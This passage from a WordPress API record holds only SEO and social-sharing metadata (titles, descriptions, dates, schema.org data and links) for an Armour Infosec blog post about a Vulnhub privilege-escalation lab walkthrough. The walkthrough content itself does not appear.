\/>\n\t<meta property=\"og:image:height\" content=\"684\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"Armour Infosec\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@ArmourInfosec\" \/>\n<meta name=\"twitter:site\" content=\"@ArmourInfosec\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Armour Infosec\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"13 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.armourinfosec.com\/escalate-my-privileges-vulnhub-walkthrough\/\",\"url\":\"https:\/\/www.armourinfosec.com\/escalate-my-privileges-vulnhub-walkthrough\/\",\"name\":\"Escalate My Privileges Vulnhub Walkthrough - Armour Infosec\",\"isPartOf\":{\"@id\":\"https:\/\/www.armourinfosec.com\/#website\"},\"datePublished\":\"2020-04-21T20:31:07+00:00\",\"dateModified\":\"2020-05-17T04:49:33+00:00\",\"author\":{\"@id\":\"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308\"},\"description\":\"Here's the another article on Escalate My Privileges Vulnhub Walkthrough designed by Akanksha Sachin Verma for learning Linux Privilege Escalation skills.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.armourinfosec.com\/escalate-my-privileges-vulnhub-walkthrough\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.armourinfosec.com\/escalate-my-privileges-vulnhub-walkthrough\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.armourinfosec.com\/escalate-my-privileges-vulnhub-walkthrough\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.armourinfosec.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Escalate My Privileges Vulnhub Walkthrough\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.armourinfosec.com\/#website\",\"url\":\"https:\/\/www.armourinfosec.com\/\",\"name\":\"Armour Infosec\",\"description\":\"Do Your Part - Be Security Smart\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.armourinfosec.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-US\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308\",\"name\":\"Armour Infosec\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.armourinfosec.com\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g\",\"caption\":\"Armour Infosec\"},\"sameAs\":[\"https:\/\/www.armourinfosec.com\/\"],\"url\":\"https:\/\/www.armourinfosec.com\/author\/admin\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Escalate My Privileges Vulnhub Walkthrough - Armour Infosec","description":"Here's the another article on Escalate My Privileges Vulnhub Walkthrough designed by Akanksha Sachin Verma for learning Linux Privilege Escalation skills.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.armourinfosec.com\/escalate-my-privileges-vulnhub-walkthrough\/","og_locale":"en_US","og_type":"article","og_title":"Escalate My Privileges Vulnhub Walkthrough - Armour Infosec","og_description":"Here's the another article on Escalate My Privileges Vulnhub Walkthrough designed by Akanksha Sachin Verma for learning Linux Privilege Escalation skills.","og_url":"https:\/\/www.armourinfosec.com\/escalate-my-privileges-vulnhub-walkthrough\/","og_site_name":"Armour Infosec","article_publisher":"https:\/\/www.facebook.com\/ArmourInfosec","article_published_time":"2020-04-21T20:31:07+00:00","article_modified_time":"2020-05-17T04:49:33+00:00","og_image":[{"width":1342,"height":684,"url":"https:\/\/www.armourinfosec.com\/wp-content\/uploads\/2020\/04\/Screenshot-from-2020-04-03-10-52-43.png","type":"image\/png"}],"author":"Armour Infosec","twitter_card":"summary_large_image","twitter_creator":"@ArmourInfosec","twitter_site":"@ArmourInfosec","twitter_misc":{"Written by":"Armour Infosec","Est. reading time":"13 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.armourinfosec.com\/escalate-my-privileges-vulnhub-walkthrough\/","url":"https:\/\/www.armourinfosec.com\/escalate-my-privileges-vulnhub-walkthrough\/","name":"Escalate My Privileges Vulnhub Walkthrough - Armour Infosec","isPartOf":{"@id":"https:\/\/www.armourinfosec.com\/#website"},"datePublished":"2020-04-21T20:31:07+00:00","dateModified":"2020-05-17T04:49:33+00:00","author":{"@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308"},"description":"Here's the another article on Escalate My Privileges Vulnhub Walkthrough designed by Akanksha Sachin Verma for learning Linux Privilege Escalation skills.","breadcrumb":{"@id":"https:\/\/www.armourinfosec.com\/escalate-my-privileges-vulnhub-walkthrough\/#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.armourinfosec.com\/escalate-my-privileges-vulnhub-walkthrough\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.armourinfosec.com\/escalate-my-privileges-vulnhub-walkthrough\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.armourinfosec.com\/"},{"@type":"ListItem","position":2,"name":"Escalate My Privileges Vulnhub Walkthrough"}]},{"@type":"WebSite","@id":"https:\/\/www.armourinfosec.com\/#website","url":"https:\/\/www.armourinfosec.com\/","name":"Armour Infosec","description":"Do Your Part - Be Security Smart","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.armourinfosec.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-US"},{"@type":"Person","@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/1d8ec30560e735c34fa5d464a1357308","name":"Armour Infosec","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/www.armourinfosec.com\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/17f812901d8294702576e81ddce5aa92?s=96&d=mm&r=g","caption":"Armour Infosec"},"sameAs":["https:\/\/www.armourinfosec.com\/"],"url":"https:\/\/www.armourinfosec.com\/author\/admin\/"}]}},"menu_order":0,"_links":{"self":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts\/26054"}],"collection":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/comments?post=26054"}],"version-history":[{"count":0,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/posts\/26054\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/media\/26056"}],"wp:attachment":[{"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/media?parent=26054"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/categories?post=26054"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.armourinfosec.com\/wp-json\/wp\/v2\/tags?post=26054"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}